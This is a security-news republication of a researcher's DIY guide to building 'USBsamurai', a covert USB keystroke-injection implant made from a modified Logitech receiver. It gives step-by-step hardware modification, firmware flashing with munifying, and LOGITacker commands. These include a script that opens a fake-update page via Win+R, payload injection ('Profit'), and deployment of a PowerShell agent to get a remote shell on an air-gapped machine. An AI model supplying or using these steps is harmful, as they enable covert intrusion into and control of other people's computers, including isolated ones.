Pierluigi Paganini September 26, 2019

The popular researcher Luca Bongiorni described how to make a malicious USB Implant (USBsamurai) that allows bypassing Air-Gapped environments with 10$.

In the previous post, I have talked a bit about USBsamurai based on C-U0007.

With this article I wanna bring more light regarding:

• Which are the differences between C-U0007 & C-U0012
• How to Build USBsamurai with a C-U0012
• How to flash the C-U0012 with the LIGHTSPEED Firmware
• How to Flash the C-U0007 with the G700 firmware to achieve better performances and get the Air-Gap Bypass feature
• How to setup LOGITacker

Let’s get started!

Differences between C-U0007 & C-U0012:

As you see below, they quite differ from aesthetic point of view. Moreover, the C-U0007 mounts a Nordic chipset and the C-U0012 a TI chipset. This info will be partially useful when will be matter of picking the best hardware for creating USBsamurai.

How to Flash the C-U0007 with the G700 firmware to achieve better performances and get the Air-Gap Bypass feature:

First of all, why do we need to flash the G700 firmware on the C-U0007?

Simple, for keystroke injection, the receiver model matters, as typing speed depends on this. For Unifying receivers (i.e. C-U0007), typing out the Air-gap Bypass Client takes aprox. 2 minutes. Which, despite being typed on a stealthy way, is not optimal.

For Unifying receivers with a Nordic chipset (i.e. C-U0007), this could be reduced to 30 seconds if a G700 firmware is used, but injection is always unencrypted* (meaning everybody else could inject to, as G700 accepts plain injection).

*In case you want more privacy while injecting payloads… I recommend to use the slightly more expensive C-U0012 which has encryption enabled.

How we can improve C-U0007 speed?
You need to buy an old G700 mouse and dump with munifying its firmware and then flash all the C-U0007 you want. Luckily, It happens I have a G700 firmware available HERE. 🙂 Check below for the detailed instructions.

As for TI receivers (i.e. C-U0008/0012) typing speed could be also reduced to 30 seconds with a LIGHTSPEED firmware. Where do you get the LIGHTSPEED firmware? Either on Logitech’s Github or HERE. But will be discussed in details later on in this article.

How to Build USBsamurai with a C-U00012

IMPORTANT! Before starting be sure you know what you are doing and have all your tools around!

The process is rather simple:

• With patience open the USB dongle and extract the PCB with the antenna.
• Open the USB cable** without destroying it. Use a scalpel to help you.
• Slightly cut the white plastic of the USB male connector in order to expose its pins.
• Add flux and solder to those pins and do the same to the pins on the C-U0012.
• Solder all together ads in the images below. Help yourself with some clamps eventually. Remember they have to be soldered as close as possible to eachother in order to better fit the USB case! Before soldering immediately, check measures!!! DON’T RUSH the first time!

**I recommend trying with this, I built few of USBsamurai with this cable. Is quite easy to open with a scalpel. https://www.aliexpress.com/item/33052091501.html

Congrats! Now you have your first USBsamurai based on C-U0012!

How to flash the C-U0012 with the LIGHTSPEED Firmware

Download the firmware either from Logitech’s Github or HERE and use munifying to flash it on the C-U0012 dongle!

For LIGHTSPEED, throughput is higher than a normal Unifying firmware, and most importantly the covert channel is Encrypted. Therefore LOGITacker needs to know its encryption key. Which is achieved by pairing the C-U0012 dongle with the LOGITacker itself.

Also remember that if you plan to use an USBsamurai based on C-U0012…LOGITacker needs to run in LIGHTSPEED mode. You can set it with the commands:

Remember: if instead, you wanna use a C-U0007 with G700 fw, you will have to switch operational mode back to g700:

How to Flash the C-U0007 with the G700 firmware to achieve better performances and get the Air-Gap Bypass feature

The Flashing procedure is pretty simple:

• Plug the C-U0007 dongle on the computer.
• Download the G700 firmware available HERE.
• Run “sudo ./munifying flash -r [C-U0007_G700]_RQR21.00_B0007_BOT01.02.B0014.bin”

• Done! You are ready to pair your new USBsamurai with LOGITacker!

Reminder: LOGITacker needs to run in G700 mode. You can set it with the commands:

If instead, you wanna use a C-U0012 with LIGHTSPEED fw, you will have to switch your LOGITacker’s operational mode back to LIGHTSPEED:

How to setup LOGITacker

Here we need to split the topic in few points, and I won’t go that deep since there is plenty of documentation in its Github’s repo.

First of all, I assume you already flash the latest release of it in one of the compatible hardware. [In case you are updating to latest release, after flashing it, connect to LOGITacker via serial and do issue erase_flash command. Note that you may loose all your previous scripts and data.]

Working modes (This is mandatory to get everything working properly!!!):

• For an USBsamurai based on C-U0007 (w/ G700 fw) you need to setup LOGITacker workmode to g700.
• For an USBsamurai based on C-U0012 (w/ LIGHTSPEED fw) you need to setup LOGITacker workmode to lightspeed.

How to create a script and automatically load at startup:

Simple, connect to LOGITacker over serial and type something as follow.

script press GUI r
script delay 500
script string iexplore -k http://fakeupdate.net/wnc/
script delay 200
script press RETURN
script store wannacry

Once saved in the flash, try to load it again.

script load wannacry
script show

The following commands will tell LOGITacker to use this payload as default one for each injection.

options inject default-script wannacry
options store

How To Pair USBsamurai:

• First, From your computer’s terminal run “sudo ./munifying pair”
• Then, From LOGITacker console run “pair device run”
• The pairing data (i.e. encryption keys) will be stored into LOGITacker’s flash.

IMPORTANT!: Every-time you will turn-on LOGITAcker you will have to load from the flash the pairing data of the very specific USBsamurai you wanna use. To do that you need to type the following command

devices storage load XX:XX:XX:XX:XX

and pick the right address of that specific dongle. Of course you can load multiple USBsamurai!

How To Inject Payloads:

• Set the proper workmode on LOGITacker, if not set yet (i.e. g700 or lightspeed).
• Load a paired USBsamurai from Flash, if not yet loaded (i.e. “devices storage load XX:XX:XX:XX:XX”)
• Tell LOGITACker to use that specific USBsamurai (i.e. “inject target XX:XX:XX:XX:XX“)
• Start payload injection at your will with “inject execute”
• Profit.

How To Bypass an Air-Gapped Machine:

• Set the proper workmode on LOGITacker, if not set yet (i.e. g700 or lightspeed).
• Load a paired USBsamurai from Flash, if not yet loaded (i.e. “devices storage load XX:XX:XX:XX:XX”)
• First deploy the PoSH agent with “covert_channel deploy XX:XX:XX:XX:XX”
• Wait aprox. 30 seconds for the agent to be fully injected.
• Type “cover_channel connect XX:XX:XX:XX:XX”
• Voila’! You got your remote shell on an Air-Gapped machine!
• NOTE: To exit the shell, type “!exit”

Troubleshooting Tips

IMPORTANT!!! Be sure you have ONLY that Logitech dongle connected on your computer!! Otherwise, run a Kali VM and attach to it ONLY the C-U00xx you wanna flash/pair!

Moreover, either setup all software on a Kali VM (which is confirmed running all fine) or use sudo to run on your preferred Linux OS.

Regarding munifying, I usually download it from Github, install golang, libusb and then compile it with “go build”.

F.A.Q.

• I am too dumb to build an USBsamurai by myself. Do you sell it?

No. This is a DIY project and will stay as it is. But… if you have a spare Bitcoin to give to some no-profit organization around the world… send me the proof of payment and I will make you a shiny USBsamurai!

• Does the USB cable support data pass-through?

No. So far it cannot. Though, there are some hackish ways to accomplish it. Example, by using an external NanoHub (https://www.smart-prototyping.com/NanoHub-tiny-USB-hub-for-hacking-projects).

Of course, I couldn’t conclude this article without not thanking Marcus “LOGIhacker” Mengs (a.k.a. @mame82) for having created such amazing software and (especially) for having shared with the community in FOSS!

About the author Luca Bongiorni:

Biografia:Luca is working as Principal Offensive Security Engineer and in his spare time is involved in InfoSec where the main fields of research are: Radio Networks, Hardware Reverse Engineering, Hardware Hacking, Internet of Things and Physical Security. He also loves to share his knowledge and present some cool projects at security conferences around the globe. At the moment is focusing his researches on bypassing biometric access control systems, ICS Security and Air-Gapped Environments.

Pierluigi Paganini

(SecurityAffairs – air-gapped network, USBSamurai)

[adrotate banner=”5″]

[adrotate banner=”13″]